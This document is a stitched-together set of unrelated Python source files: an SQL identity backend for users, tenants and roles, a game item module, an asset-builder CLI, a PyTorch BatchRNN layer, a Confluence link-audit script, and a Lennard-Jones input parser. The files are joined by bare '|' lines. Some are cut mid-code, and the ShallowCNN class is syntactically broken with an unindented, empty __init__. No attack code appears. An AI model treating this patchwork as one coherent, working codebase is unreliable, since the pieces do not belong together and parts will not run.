    id = sql.Column(sql.String(64), primary_key=True)
    name = sql.Column(sql.String(64), unique=True, nullable=False)
    #password = sql.Column(sql.String(64))
    extra = sql.Column(sql.JsonBlob())

    @classmethod
    def from_dict(cls, user_dict):
        """Build a User from a flat dict, shoving any non-indexed
        properties into ``extra``.  Mutates *user_dict*.
        """
        extra = {}
        # Portability fix: dict.iteritems() is Python-2-only; items() on
        # the copy behaves identically here on both Python 2 and 3.
        for k, v in user_dict.copy().items():
            # TODO(termie): infer this somehow
            if k not in ['id', 'name', 'extra']:
                extra[k] = user_dict.pop(k)
        user_dict['extra'] = extra
        return cls(**user_dict)

    def to_dict(self):
        """Return a flat dict: the extra blob plus id and name."""
        extra_copy = self.extra.copy()
        extra_copy['id'] = self.id
        extra_copy['name'] = self.name
        return extra_copy
class Tenant(sql.ModelBase, sql.DictBase):
    """SQL model for a tenant; non-indexed attributes live in ``extra``."""
    __tablename__ = 'tenant'
    id = sql.Column(sql.String(64), primary_key=True)
    name = sql.Column(sql.String(64), unique=True, nullable=False)
    extra = sql.Column(sql.JsonBlob())

    @classmethod
    def from_dict(cls, tenant_dict):
        """Build a Tenant from a flat dict, shoving any non-indexed
        properties into ``extra``.  Mutates *tenant_dict*.
        """
        extra = {}
        # Portability fix: dict.iteritems() is Python-2-only; items() on
        # the copy behaves identically here on both Python 2 and 3.
        for k, v in tenant_dict.copy().items():
            # TODO(termie): infer this somehow
            if k not in ['id', 'name', 'extra']:
                extra[k] = tenant_dict.pop(k)
        tenant_dict['extra'] = extra
        return cls(**tenant_dict)

    def to_dict(self):
        """Return a flat dict: a deep copy of the extra blob plus id/name."""
        extra_copy = copy.deepcopy(self.extra)
        extra_copy['id'] = self.id
        extra_copy['name'] = self.name
        return extra_copy
class Role(sql.ModelBase, sql.DictBase):
    """A globally named role; grants to (user, tenant) pairs are stored in
    the Metadata table's 'roles' list, not here.
    """
    __tablename__ = 'role'
    id = sql.Column(sql.String(64), primary_key=True)
    name = sql.Column(sql.String(64), unique=True, nullable=False)
class Metadata(sql.ModelBase, sql.DictBase):
    """Per (user, tenant) JSON blob; holds e.g. the 'roles' grant list."""
    __tablename__ = 'metadata'
    #__table_args__ = (
    # sql.Index('idx_metadata_usertenant', 'user', 'tenant'),
    # )
    # Composite primary key: one row per (user, tenant) pair.
    user_id = sql.Column(sql.String(64), primary_key=True)
    tenant_id = sql.Column(sql.String(64), primary_key=True)
    data = sql.Column(sql.JsonBlob())
class UserTenantMembership(sql.ModelBase, sql.DictBase):
    """Tenant membership join table."""
    __tablename__ = 'user_tenant_membership'
    # Composite primary key over both foreign keys: a user can belong to a
    # given tenant at most once.
    user_id = sql.Column(sql.String(64),
                         sql.ForeignKey('user.id'),
                         primary_key=True)
    tenant_id = sql.Column(sql.String(64),
                           sql.ForeignKey('tenant.id'),
                           primary_key=True)
class Identity(sql.Base, identity.Driver):
    """SQL-backed identity driver: users, tenants, roles, and the per
    (user, tenant) metadata blob that stores role grants.
    """

    # Internal interface to manage the database
    def db_sync(self):
        """Create/upgrade the database schema via sqlalchemy-migrate."""
        migration.db_sync()

    def _check_password(self, password, user_ref):
        """Check the specified password against the data store.

        This is modeled on ldap/core.py. The idea is to make it easier to
        subclass Identity so that you can still use it to store all the data,
        but use some other means to check the password.
        Note that we'll pass in the entire user_ref in case the subclass
        needs things like user_ref.get('name')
        For further justification, please see the follow up suggestion at
        https://blueprints.launchpad.net/keystone/+spec/sql-identiy-pam
        """
        return utils.check_password(password, user_ref.get('password'))

    # Identity interface
    def authenticate(self, user_id=None, tenant_id=None, password=None):
        """Authenticate based on a user, tenant and password.

        Expects the user object to have a password field and the tenant to be
        in the list of tenants on the user.
        """
        user_ref = None
        tenant_ref = None
        metadata_ref = {}
        try:
            user_ref = self._get_user(user_id)
        except exception.UserNotFound:
            raise AssertionError('Invalid user / password')
        # BUG FIX: route the check through the _check_password() hook so
        # subclasses that override it (see its docstring) are honored;
        # previously utils.check_password() was called directly, bypassing
        # the hook.  Behavior is identical for this class.
        if not self._check_password(password, user_ref):
            raise AssertionError('Invalid user / password')
        if tenant_id is not None:
            if tenant_id not in self.get_tenants_for_user(user_id):
                raise AssertionError('Invalid tenant')
            try:
                tenant_ref = self.get_tenant(tenant_id)
                metadata_ref = self.get_metadata(user_id, tenant_id)
            except exception.TenantNotFound:
                tenant_ref = None
                metadata_ref = {}
            except exception.MetadataNotFound:
                metadata_ref = {}
        # Never leak the (hashed) password back to callers.
        return (_filter_user(user_ref), tenant_ref, metadata_ref)

    def get_tenant(self, tenant_id):
        """Return a tenant dict or raise TenantNotFound."""
        session = self.get_session()
        tenant_ref = session.query(Tenant).filter_by(id=tenant_id).first()
        if tenant_ref is None:
            raise exception.TenantNotFound(tenant_id=tenant_id)
        return tenant_ref.to_dict()

    def get_tenant_by_name(self, tenant_name):
        """Return a tenant dict looked up by name or raise TenantNotFound."""
        session = self.get_session()
        tenant_ref = session.query(Tenant).filter_by(name=tenant_name).first()
        if not tenant_ref:
            raise exception.TenantNotFound(tenant_id=tenant_name)
        return tenant_ref.to_dict()

    def get_tenant_users(self, tenant_id):
        """Return password-filtered user dicts for every member of the tenant."""
        session = self.get_session()
        self.get_tenant(tenant_id)  # raises TenantNotFound if absent
        user_refs = session.query(User)\
                           .join(UserTenantMembership)\
                           .filter(UserTenantMembership.tenant_id ==
                                   tenant_id)\
                           .all()
        return [_filter_user(user_ref.to_dict()) for user_ref in user_refs]

    def _get_user(self, user_id):
        """Return the user dict INCLUDING the password hash (internal use)."""
        session = self.get_session()
        user_ref = session.query(User).filter_by(id=user_id).first()
        if not user_ref:
            raise exception.UserNotFound(user_id=user_id)
        return user_ref.to_dict()

    def _get_user_by_name(self, user_name):
        """Like _get_user() but keyed by name."""
        session = self.get_session()
        user_ref = session.query(User).filter_by(name=user_name).first()
        if not user_ref:
            raise exception.UserNotFound(user_id=user_name)
        return user_ref.to_dict()

    def get_user(self, user_id):
        """Return the user dict with the password removed."""
        return _filter_user(self._get_user(user_id))

    def get_user_by_name(self, user_name):
        """Return the user dict (looked up by name) with the password removed."""
        return _filter_user(self._get_user_by_name(user_name))

    def get_metadata(self, user_id, tenant_id):
        """Return the metadata blob for (user, tenant) or raise MetadataNotFound."""
        session = self.get_session()
        metadata_ref = session.query(Metadata)\
                              .filter_by(user_id=user_id)\
                              .filter_by(tenant_id=tenant_id)\
                              .first()
        if metadata_ref is None:
            raise exception.MetadataNotFound()
        return metadata_ref.data

    def get_role(self, role_id):
        """Return the Role model object (not a dict) or raise RoleNotFound."""
        session = self.get_session()
        role_ref = session.query(Role).filter_by(id=role_id).first()
        if role_ref is None:
            raise exception.RoleNotFound(role_id=role_id)
        return role_ref

    def list_users(self):
        """Return password-filtered dicts for all users."""
        session = self.get_session()
        user_refs = session.query(User)
        return [_filter_user(x.to_dict()) for x in user_refs]

    def list_roles(self):
        """Return all Role model objects."""
        session = self.get_session()
        role_refs = session.query(Role)
        return list(role_refs)

    # These should probably be part of the high-level API
    def add_user_to_tenant(self, tenant_id, user_id):
        """Create a membership row; silently a no-op if it already exists."""
        session = self.get_session()
        self.get_tenant(tenant_id)
        self.get_user(user_id)
        q = session.query(UserTenantMembership)\
                   .filter_by(user_id=user_id)\
                   .filter_by(tenant_id=tenant_id)
        rv = q.first()
        if rv:
            return
        with session.begin():
            session.add(UserTenantMembership(user_id=user_id,
                                             tenant_id=tenant_id))
            session.flush()

    def remove_user_from_tenant(self, tenant_id, user_id):
        """Delete the membership row or raise NotFound."""
        session = self.get_session()
        self.get_tenant(tenant_id)
        self.get_user(user_id)
        membership_ref = session.query(UserTenantMembership)\
                                .filter_by(user_id=user_id)\
                                .filter_by(tenant_id=tenant_id)\
                                .first()
        if membership_ref is None:
            raise exception.NotFound('User not found in tenant')
        with session.begin():
            session.delete(membership_ref)
            session.flush()

    def get_tenants(self):
        """Return dicts for all tenants."""
        session = self.get_session()
        tenant_refs = session.query(Tenant).all()
        return [tenant_ref.to_dict() for tenant_ref in tenant_refs]

    def get_tenants_for_user(self, user_id):
        """Return the list of tenant ids the user is a member of."""
        session = self.get_session()
        self.get_user(user_id)  # raises UserNotFound if absent
        membership_refs = session.query(UserTenantMembership)\
                                 .filter_by(user_id=user_id)\
                                 .all()
        return [x.tenant_id for x in membership_refs]

    def get_roles_for_user_and_tenant(self, user_id, tenant_id):
        """Return the role-id list stored in the pair's metadata blob."""
        self.get_user(user_id)
        self.get_tenant(tenant_id)
        try:
            metadata_ref = self.get_metadata(user_id, tenant_id)
        except exception.MetadataNotFound:
            metadata_ref = {}
        return metadata_ref.get('roles', [])

    def add_role_to_user_and_tenant(self, user_id, tenant_id, role_id):
        """Grant a role; raises Conflict if it is already granted."""
        self.get_user(user_id)
        self.get_tenant(tenant_id)
        self.get_role(role_id)
        try:
            metadata_ref = self.get_metadata(user_id, tenant_id)
            is_new = False
        except exception.MetadataNotFound:
            metadata_ref = {}
            is_new = True
        roles = set(metadata_ref.get('roles', []))
        if role_id in roles:
            msg = ('User %s already has role %s in tenant %s'
                   % (user_id, role_id, tenant_id))
            raise exception.Conflict(type='role grant', details=msg)
        roles.add(role_id)
        metadata_ref['roles'] = list(roles)
        if is_new:
            self.create_metadata(user_id, tenant_id, metadata_ref)
        else:
            self.update_metadata(user_id, tenant_id, metadata_ref)

    def remove_role_from_user_and_tenant(self, user_id, tenant_id, role_id):
        """Revoke a role; raises RoleNotFound if it was never granted."""
        try:
            metadata_ref = self.get_metadata(user_id, tenant_id)
            is_new = False
        except exception.MetadataNotFound:
            metadata_ref = {}
            is_new = True
        roles = set(metadata_ref.get('roles', []))
        if role_id not in roles:
            msg = 'Cannot remove role that has not been granted, %s' % role_id
            raise exception.RoleNotFound(message=msg)
        roles.remove(role_id)
        metadata_ref['roles'] = list(roles)
        if is_new:
            self.create_metadata(user_id, tenant_id, metadata_ref)
        else:
            self.update_metadata(user_id, tenant_id, metadata_ref)

    # CRUD
    @handle_conflicts(type='user')
    def create_user(self, user_id, user):
        """Create a user; the password is hashed before storage."""
        user['name'] = clean.user_name(user['name'])
        user = _ensure_hashed_password(user)
        session = self.get_session()
        with session.begin():
            user_ref = User.from_dict(user)
            session.add(user_ref)
            session.flush()
        return user_ref.to_dict()

    @handle_conflicts(type='user')
    def update_user(self, user_id, user):
        """Merge *user* into the stored user; the id may not change."""
        if 'name' in user:
            user['name'] = clean.user_name(user['name'])
        session = self.get_session()
        if 'id' in user and user_id != user['id']:
            raise exception.ValidationError('Cannot change user ID')
        with session.begin():
            user_ref = session.query(User).filter_by(id=user_id).first()
            if user_ref is None:
                raise exception.UserNotFound(user_id=user_id)
            old_user_dict = user_ref.to_dict()
            user = _ensure_hashed_password(user)
            for k in user:
                old_user_dict[k] = user[k]
            new_user = User.from_dict(old_user_dict)
            user_ref.name = new_user.name
            user_ref.extra = new_user.extra
            session.flush()
        return user_ref

    def delete_user(self, user_id):
        """Delete the user along with its membership and metadata rows."""
        session = self.get_session()
        with session.begin():
            session.query(UserTenantMembership)\
                .filter_by(user_id=user_id).delete(False)
            session.query(Metadata)\
                .filter_by(user_id=user_id).delete(False)
            if not session.query(User).filter_by(id=user_id).delete(False):
                raise exception.UserNotFound(user_id=user_id)

    @handle_conflicts(type='tenant')
    def create_tenant(self, tenant_id, tenant):
        """Create a tenant and return it as a dict."""
        tenant['name'] = clean.tenant_name(tenant['name'])
        session = self.get_session()
        with session.begin():
            tenant_ref = Tenant.from_dict(tenant)
            session.add(tenant_ref)
            session.flush()
        return tenant_ref.to_dict()

    @handle_conflicts(type='tenant')
    def update_tenant(self, tenant_id, tenant):
        """Merge *tenant* into the stored tenant."""
        if 'name' in tenant:
            tenant['name'] = clean.tenant_name(tenant['name'])
        session = self.get_session()
        with session.begin():
            tenant_ref = session.query(Tenant).filter_by(id=tenant_id).first()
            if tenant_ref is None:
                raise exception.TenantNotFound(tenant_id=tenant_id)
            old_tenant_dict = tenant_ref.to_dict()
            for k in tenant:
                old_tenant_dict[k] = tenant[k]
            new_tenant = Tenant.from_dict(old_tenant_dict)
            tenant_ref.name = new_tenant.name
            tenant_ref.extra = new_tenant.extra
            session.flush()
        return tenant_ref

    def delete_tenant(self, tenant_id):
        """Delete the tenant along with its membership and metadata rows."""
        session = self.get_session()
        with session.begin():
            session.query(UserTenantMembership)\
                .filter_by(tenant_id=tenant_id).delete(False)
            session.query(Metadata)\
                .filter_by(tenant_id=tenant_id).delete(False)
            if not session.query(Tenant).filter_by(id=tenant_id).delete(False):
                raise exception.TenantNotFound(tenant_id=tenant_id)

    @handle_conflicts(type='metadata')
    def create_metadata(self, user_id, tenant_id, metadata):
        """Insert the metadata blob for a (user, tenant) pair."""
        session = self.get_session()
        with session.begin():
            session.add(Metadata(user_id=user_id,
                                 tenant_id=tenant_id,
                                 data=metadata))
            session.flush()
        return metadata

    @handle_conflicts(type='metadata')
    def update_metadata(self, user_id, tenant_id, metadata):
        """Merge *metadata* into the stored blob for a (user, tenant) pair."""
        session = self.get_session()
        with session.begin():
            metadata_ref = session.query(Metadata)\
                                  .filter_by(user_id=user_id)\
                                  .filter_by(tenant_id=tenant_id)\
                                  .first()
            data = metadata_ref.data.copy()
            for k in metadata:
                data[k] = metadata[k]
            metadata_ref.data = data
            session.flush()
        return metadata_ref

    def delete_metadata(self, user_id, tenant_id):
        """Delete the metadata row for a (user, tenant) pair, if any."""
        # BUG FIX: this previously called self.db.delete(...), but this SQL
        # backend has no ``db`` attribute (that is the KVS backend's API),
        # so the call could only raise AttributeError.  Delete through a
        # SQL session like the other delete_* methods.
        session = self.get_session()
        with session.begin():
            session.query(Metadata)\
                .filter_by(user_id=user_id)\
                .filter_by(tenant_id=tenant_id)\
                .delete(False)
        return None

    @handle_conflicts(type='role')
    def create_role(self, role_id, role):
        """Create a role from a dict of column values."""
        session = self.get_session()
        with session.begin():
            session.add(Role(**role))
            session.flush()
        return role

    @handle_conflicts(type='role')
    def update_role(self, role_id, role):
        """Merge *role* into the stored role."""
        session = self.get_session()
        with session.begin():
            role_ref = session.query(Role).filter_by(id=role_id).first()
            if role_ref is None:
                raise exception.RoleNotFound(role_id=role_id)
            for k in role:
                role_ref[k] = role[k]
            session.flush()
        return role_ref

    def delete_role(self, role_id):
        """Delete a role or raise RoleNotFound."""
        session = self.get_session()
        with session.begin():
            if not session.query(Role).filter_by(id=role_id).delete():
                raise exception.RoleNotFound(role_id=role_id)
            session.flush()
|
"""Give and take items to/from a character."""
from . import numbers as no
class ItemGiver:
    """Abstract base for actions that modify a character's items/variables."""

    def give(self, character):
        """Apply this giver's effect to *character*; subclasses must override."""
        raise NotImplementedError()
class Add(ItemGiver):
    """ItemGiver that increases an item count or variable."""

    def __init__(self, item, value=no.Constant(1)):
        """Create the add action.

        Parameters
        ----------
        item : string
            An item or variable
        value : ave.numbers.Number
            The value to add to a variable
        """
        self.item = item
        self.value = value

    def give(self, character):
        """Add the computed value of ``item`` to *character*."""
        amount = self.value.get_value(character)
        character.add(self.item, amount)
class Remove(ItemGiver):
    """ItemGiver that decreases an item count or variable."""

    def __init__(self, item, value=no.Constant(1)):
        """Create the remove action.

        Parameters
        ----------
        item : string
            An item or variable
        value : ave.numbers.Number
            The value to take from a variable
        """
        self.item = item
        self.value = value

    def give(self, character):
        """Remove the computed value of ``item`` from *character*."""
        amount = self.value.get_value(character)
        character.remove(self.item, amount)
class Set(ItemGiver):
    """ItemGiver that overwrites a variable with a value."""

    def __init__(self, item, value):
        """Create the set action.

        Parameters
        ----------
        item : string
            The variable
        value : ave.numbers.Number
            The value to set it to
        """
        self.item = item
        self.value = value

    def give(self, character):
        """Set ``item`` on *character* to the computed value."""
        new_value = self.value.get_value(character)
        character.set(self.item, new_value)
|
import functools
import importlib
import pathlib
import pkgutil
import re
import click
from . import builders
from .formatter import AssetFormatter
from .writer import AssetWriter
def make_symbol_name(base=None, working_path=None, input_file=None, input_type=None, input_subtype=None, prefix=None):
    """Build a lowercase, identifier-safe symbol name for an asset.

    If *base* is given it is treated as a format template with the fields
    ``filename``, ``filepath``, ``fullname``, ``fullpath``, ``type`` and
    ``subtype``; otherwise the name is derived from *input_file*'s path
    components (relative to *working_path* when provided).  Dots and any
    other non-alphanumeric characters become underscores, the result is
    lowercased, and *prefix* (if a string) is prepended verbatim.

    Raises NameError when neither *base* nor *input_file* is supplied
    (kept as NameError for backward compatibility with existing callers).
    """
    if base is None:
        if input_file is None:
            raise NameError("No base name or input file provided.")
        if working_path is None:
            name = '_'.join(input_file.parts)
        else:
            name = '_'.join(input_file.relative_to(working_path).parts)
    else:
        name = base.format(
            filename=input_file.with_suffix('').name,
            filepath=input_file.with_suffix(''),
            fullname=input_file.name,
            fullpath=input_file,
            type=input_type,
            subtype=input_subtype
        )
    name = name.replace('.', '_')
    name = re.sub('[^0-9A-Za-z_]', '_', name)
    name = name.lower()
    # isinstance replaces the `type(prefix) is str` anti-pattern (also
    # accepts str subclasses); note the prefix intentionally escapes the
    # lowercasing above.
    if isinstance(prefix, str):
        name = prefix + name
    return name
class AssetBuilder:
    """Decorator/registry for asset build functions.

    Constructed with a ``typemap`` of ``{subtype: {extension: auto_flag}}``
    and then applied to a build function; the function's name becomes the
    builder name.  Builders register globally by name and, for extensions
    flagged ``auto``, by file extension.
    """

    # Class-level registries shared by every builder instance.
    _by_name = {}
    _by_extension = {}

    def __init__(self, typemap):
        self.typemap = typemap

    def __call__(self, build_func):
        """Register *build_func* as this builder's implementation."""
        self.name = build_func.__name__
        self.build = build_func
        self._by_name[self.name] = self
        for subtype, extensions in self.typemap.items():
            for ext, auto in extensions.items():
                if auto:
                    if ext in self._by_extension:
                        raise KeyError(f'An automatic handler for {ext} has already been registered ({self._by_extension[ext]}).')
                    self._by_extension[ext] = f'{self.name}/{subtype}'
        return self

    def __repr__(self):
        return self.name

    @staticmethod
    def build(self, data, subtype, **kwargs):
        # Placeholder; __call__ replaces it per-instance with the real
        # build function, so this only fires on an unregistered builder.
        raise NotImplementedError

    def from_file(self, path, subtype, **kwargs):
        """Build an asset from *path*, guessing the subtype when not given."""
        if subtype is None:
            subtype = self.guess_subtype(path)
        elif subtype not in self.typemap.keys():
            raise ValueError(f'Invalid subtype {subtype}, choices {self.typemap.keys()}')
        return self.build(path.read_bytes(), subtype, **kwargs)

    def guess_subtype(self, path):
        """Return the subtype whose extension map contains path's suffix."""
        for input_type, extensions in self.typemap.items():
            if path.suffix in extensions:
                return input_type
        raise TypeError(f"Unable to identify type of input file {path.name}.")

    @classmethod
    def guess_builder(cls, path):
        """Return the 'name/subtype' handler registered for path's suffix."""
        try:
            return cls._by_extension[path.suffix]
        except KeyError:
            # BUG FIX: this message was a plain string containing the
            # literal text '{path}'; it is now an f-string so the actual
            # offending path is reported.
            raise TypeError(f'Could not find a builder for {path}.')
class AssetTool:
    """Generates a click CLI command for an AssetBuilder.

    Instances are used as decorators: the decorated function converts an
    input file into asset data, and the generated command supplies the
    common input/output/format/symbol-name options around it.
    """

    # Registry of generated click commands, keyed by builder name
    # (class-level, shared by all AssetTool instances).
    _commands = {}

    def __init__(self, builder, help):
        self.builder = builder
        self.name = builder.name
        self.help = help

    def __call__(self, f):
        @click.command(self.name, help=self.help)
        @click.option('--input_file', type=pathlib.Path, required=True, help='Input file')
        @click.option('--input_type', type=click.Choice(self.builder.typemap.keys(), case_sensitive=False), default=None, help='Input file type')
        @click.option('--output_file', type=pathlib.Path, default=None, help='Output file')
        @click.option('--output_format', type=click.Choice(AssetFormatter.names(), case_sensitive=False), default=None, help='Output file format')
        @click.option('--symbol_name', type=str, default=None, help='Output symbol name')
        @click.option('--force/--keep', default=False, help='Force file overwriting')
        @functools.wraps(f)
        def cmd(input_file, input_type, output_file, output_format, symbol_name, force, **kwargs):
            aw = AssetWriter()
            aw.add_asset(symbol_name, f(input_file, input_type, **kwargs))
            aw.write(output_format, output_file, force, report=False)
        self._commands[self.name] = cmd
        # NOTE(review): __call__ returns None, so the decorated name is
        # rebound to None at the call site; callers appear to rely only on
        # the _commands registry -- confirm before returning cmd here.
# Load all the implementations dynamically.
for loader, module_name, is_pkg in pkgutil.walk_packages(builders.__path__, builders.__name__ + '.'):
    # We don't need to import anything from the modules. We just need to load them.
    # This will cause the decorators to run, which registers the builders
    # (populating AssetBuilder._by_name / _by_extension as an import side effect).
    importlib.import_module(module_name, builders.__name__)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class BatchRNN(nn.Module):
    """
    RNN layer with BatchNormalization and parameter reset,
    convert input: (batch, windows, in_features) into output: (batch, windows, out_features)
    optional: bidirectional default set to be True which means using BIRNN
    """
    def __init__(self, in_features, out_features, windows=200, rnn_type=nn.LSTM, dropout=0.3, bidirectional=True, batch_norm=True):
        super(BatchRNN, self).__init__()
        self.out_features = out_features
        self.rnn_type = rnn_type
        self.bidirectional = bidirectional
        self.batch_norm = batch_norm
        self.in_features = in_features
        self.rnn = rnn_type(input_size=in_features, hidden_size=out_features,
                            bidirectional=bidirectional, batch_first=True)
        # BUG FIX: self.dropout was first assigned the float rate and then
        # immediately overwritten with the module; keep only the module.
        self.dropout = nn.Dropout(p=dropout)
        # Normalizes over the window (time) dimension of (batch, windows, features).
        self.BatchNorm1d = nn.BatchNorm1d(windows)
        # Initialize the recurrent weights once, at construction time.
        self.reset_parameters()

    def reset_parameters(self):
        """Kaiming-init input-hidden weights, Xavier-init hidden-hidden
        weights, and zero all biases of the RNN."""
        for name, param in self.rnn.named_parameters():
            if 'weight_ih' in name:
                nn.init.kaiming_normal_(param.data)
            elif 'weight_hh' in name:
                nn.init.xavier_normal_(param.data)
            else:
                param.data.fill_(0)

    def forward(self, x):
        # BUG FIX: reset_parameters() was previously called here, which
        # re-initialized the weights on EVERY forward pass and discarded
        # all training progress; it now runs once in __init__.
        if self.batch_norm:
            x = self.BatchNorm1d(x)  # (batch_size, windows, features)
        x, _ = self.rnn(x)
        # x = self.dropout(x)
        if self.bidirectional:
            # sum two directions which means (B,W,H*2) => (B,W,H)
            x = x.view(x.shape[0], x.shape[1], 2, -1).sum(2).view(x.shape[0], x.shape[1], -1)
        return x
def fclayer(in_features, out_features):
    """Create a fully connected (dense) layer with Kaiming-initialized weights.

    Maps (batch, windows, in_features) tensors to
    (batch, windows, out_features).

    :param in_features: input dimension (channels * features)
    :param out_features: output dimension
    :return: an nn.Linear module
    """
    layer = nn.Linear(in_features, out_features)
    nn.init.kaiming_normal_(layer.weight)
    return layer
class ShallowCNN(nn.Module):
def __init__(self, ): |
import os
import re
import sys
from atlassian import Confluence
from bs4 import BeautifulSoup
def verify_environment_variables():
    """Return a truthy value iff both Atlassian credentials are set.

    Note: like a chained ``and``, this returns the second variable's value
    (or the first falsy one), not a strict bool.
    """
    email = os.getenv("ATLASSIAN_EMAIL")
    token = os.getenv("ATLASSIAN_API_TOKEN")
    return email and token
def trim_html_tags(html):
    """Strip all markup from *html* and return just the text content."""
    return BeautifulSoup(html, "html.parser").get_text()
def extract_anchor_urls(html):
    """Return the href value (possibly None) of every <a> tag in *html*."""
    soup = BeautifulSoup(html, "html.parser")
    anchors = soup.find_all("a")
    return [anchor.get("href") for anchor in anchors]
if __name__ == "__main__":
    # Audit a Confluence space: print each page's size and flag links that
    # look like direct links into Google Docs/Drive.
    if not verify_environment_variables():
        sys.exit(
            "Make sure that the environment variables ATLASSIAN_EMAIL and "
            "ATLASSIAN_API_TOKEN are set."
        )
    confluence = Confluence(
        url="https://pyconjp.atlassian.net",
        username=os.getenv("ATLASSIAN_EMAIL"),
        password=os.getenv("ATLASSIAN_API_TOKEN"),
    )
    space_content = confluence.get_space_content("pyconjp")
    pages = space_content["page"]["results"]
    print(f"{len(pages)} pages")
    print("-" * 40)
    for page in pages:
        title = page["title"]
        html_body = page["body"]["storage"]["value"]
        content = trim_html_tags(html_body)
        print(f"{title} ({len(content)} characters)")
        urls = extract_anchor_urls(html_body)
        for url in urls:
            # Identify links that appear to point directly at a shared drive.
            # BUG FIX: the dots were unescaped ("drive.google.com"), so "."
            # matched any character; also guard against href-less anchors,
            # for which extract_anchor_urls yields None (re.match(None)
            # would raise TypeError).
            if url and re.match(r"https?://(docs|drive)\.google\.com/.*", url):
                print(url)
        print("-" * 30)
|
"""
parses the input file for keywords
"""
from autoparse.find import first_capture
from autoparse.find import all_captures
from autoparse.pattern import capturing
from autoparse.pattern import zero_or_more
from autoparse.pattern import one_or_more
from autoparse.pattern import escape
from autoparse.pattern import NONSPACE
from autoparse.pattern import SPACE
from autoparse.pattern import WILDCARD
from autoparse.pattern import INTEGER
from autoparse.pattern import LINE_FILL
from autoparse.pattern import NONNEWLINE
from autoparse.pattern import NEWLINE
# Section headers ($<name> ... $end) the input parser recognizes.
INPUT_SUPPORTED_SECTIONS = [
    'lennard_jones',
    'properties',
    'baths',
    'targets'
]
# Sections that must be present in every input file.
INPUT_REQUIRED_SECTIONS = [
    'lennard_jones',
    'baths',
    'targets'
]
# Keywords accepted inside the $lennard_jones section.
LJ_SUPPORTED_KEYWORDS = [
    'theory_level',
    'potential',
    'nsamps',
    'njobs',
    'smin',
    'smax',
    'run_prefix',
    'save_prefix',
    'conf'
]
# Keywords that must appear inside the $lennard_jones section.
LJ_REQUIRED_KEYWORDS = [
    'theory_level',
    'potential',
    'nsamps',
    'njobs',
    'run_prefix',
    'save_prefix',
]
# Read the targets and baths sections and species
def read_targets(input_string):
    """ builds a dictionary containing all needed info for the targets
    """
    targets_dct = {}
    for line in _get_targets_section(input_string).splitlines():
        columns = line.strip().split()
        assert len(columns) >= 4
        name, ich, chg, mult = columns[:4]
        targets_dct[name] = [ich, int(chg), int(mult)]
    # at least one target line is required
    assert targets_dct
    return targets_dct
def read_baths(input_string):
    """ builds a dictionary containing all needed info for the baths
    """
    baths_section = _get_baths_section(input_string)
    baths_lst = []
    for line in baths_section.splitlines():
        tmp = line.strip().split()
        assert len(tmp) >= 4
        # columns: <name> <inchi> <charge> <multiplicity>; the name is ignored
        ich, chg, mult = tmp[1], tmp[2], tmp[3]
        # NOTE(review): this REBINDS baths_lst each iteration instead of
        # appending, so only the last bath line survives (contrast with
        # read_targets, which accumulates). Presumably exactly one bath is
        # expected — confirm; if several are allowed this should append.
        baths_lst = [ich, int(chg), int(mult)]
    assert baths_lst
    return baths_lst
def _get_targets_section(input_string):
    """ grabs the section of text containing all of the targets
    """
    header = escape('$targets') + LINE_FILL + NEWLINE
    body = capturing(one_or_more(WILDCARD, greedy=False))
    section = first_capture(header + body + escape('$end'), input_string)
    assert section is not None
    return section
def _get_baths_section(input_string):
    """ grabs the section of text containing all of the baths
    """
    header = escape('$baths') + LINE_FILL + NEWLINE
    body = capturing(one_or_more(WILDCARD, greedy=False))
    section = first_capture(header + body + escape('$end'), input_string)
    assert section is not None
    return section
# Read the keywords from the lennard jones section
def read_potential(input_string):
    """ obtain the potential to be used
    """
    eq_sign = zero_or_more(SPACE) + '=' + zero_or_more(SPACE)
    section = _get_lennard_jones_options_section(input_string)
    captured = first_capture(
        'potential' + eq_sign + capturing(one_or_more(NONSPACE)), section)
    # NOTE(review): only the 'lj126' potential is accepted today.
    assert captured == 'lj126'
    return captured
def read_nsamps(input_string):
    """ obtain the nsamps to be used
    """
    eq_sign = zero_or_more(SPACE) + '=' + zero_or_more(SPACE)
    section = _get_lennard_jones_options_section(input_string)
    captured = first_capture('nsamps' + eq_sign + capturing(INTEGER), section)
    # required keyword: must be present
    assert captured is not None
    return int(captured)
def read_njobs(input_string):
    """ obtain the njobs to be used
    """
    eq_sign = zero_or_more(SPACE) + '=' + zero_or_more(SPACE)
    section = _get_lennard_jones_options_section(input_string)
    captured = first_capture('njobs' + eq_sign + capturing(INTEGER), section)
    # required keyword: must be present
    assert captured is not None
    return int(captured)
def read_smin(input_string):
    """ obtain the smin to be used
    """
    eq_sign = zero_or_more(SPACE) + '=' + zero_or_more(SPACE)
    section = _get_lennard_jones_options_section(input_string)
    captured = first_capture('smin' + eq_sign + capturing(INTEGER), section)
    # optional keyword: defaults to 2 when absent
    return 2 if captured is None else int(captured)
def read_smax(input_string):
    """ obtain the smax to be used
    """
    eq_sign = zero_or_more(SPACE) + '=' + zero_or_more(SPACE)
    section = _get_lennard_jones_options_section(input_string)
    captured = first_capture('smax' + eq_sign + capturing(INTEGER), section)
    # optional keyword: defaults to 6 when absent
    return 6 if captured is None else int(captured)
def read_conf(input_string):
    """ obtain the confs to be used
    """
    eq_sign = zero_or_more(SPACE) + '=' + zero_or_more(SPACE)
    section = _get_lennard_jones_options_section(input_string)
    captured = first_capture(
        'conf' + eq_sign + capturing(one_or_more(NONSPACE)), section)
    assert captured is not None
    return captured
def read_run_prefix(input_string):
    """ obtain the run_prefix to be used
    """
    eq_sign = zero_or_more(SPACE) + '=' + zero_or_more(SPACE)
    section = _get_lennard_jones_options_section(input_string)
    captured = first_capture(
        'run_prefix' + eq_sign + capturing(one_or_more(NONSPACE)), section)
    assert captured is not None
    return captured
def read_save_prefix(input_string):
    """ obtain the save_prefix to be used
    """
    eq_sign = zero_or_more(SPACE) + '=' + zero_or_more(SPACE)
    section = _get_lennard_jones_options_section(input_string)
    captured = first_capture(
        'save_prefix' + eq_sign + capturing(one_or_more(NONSPACE)), section)
    assert captured is not None
    return captured
def read_theory_level(input_string):
    """ obtain the theory level
    """
    eq_sign = zero_or_more(SPACE) + '=' + zero_or_more(SPACE)
    section = _get_lennard_jones_options_section(input_string)
    captured = first_capture(
        'theory_level' + eq_sign + capturing(one_or_more(NONSPACE)), section)
    assert captured is not None
    return captured
def _get_lennard_jones_options_section(input_string):
    """ grabs the section of text containing all of the job keywords
        for lennard jones calculations
    """
    header = escape('$lennard_jones') + LINE_FILL + NEWLINE
    body = capturing(one_or_more(WILDCARD, greedy=False))
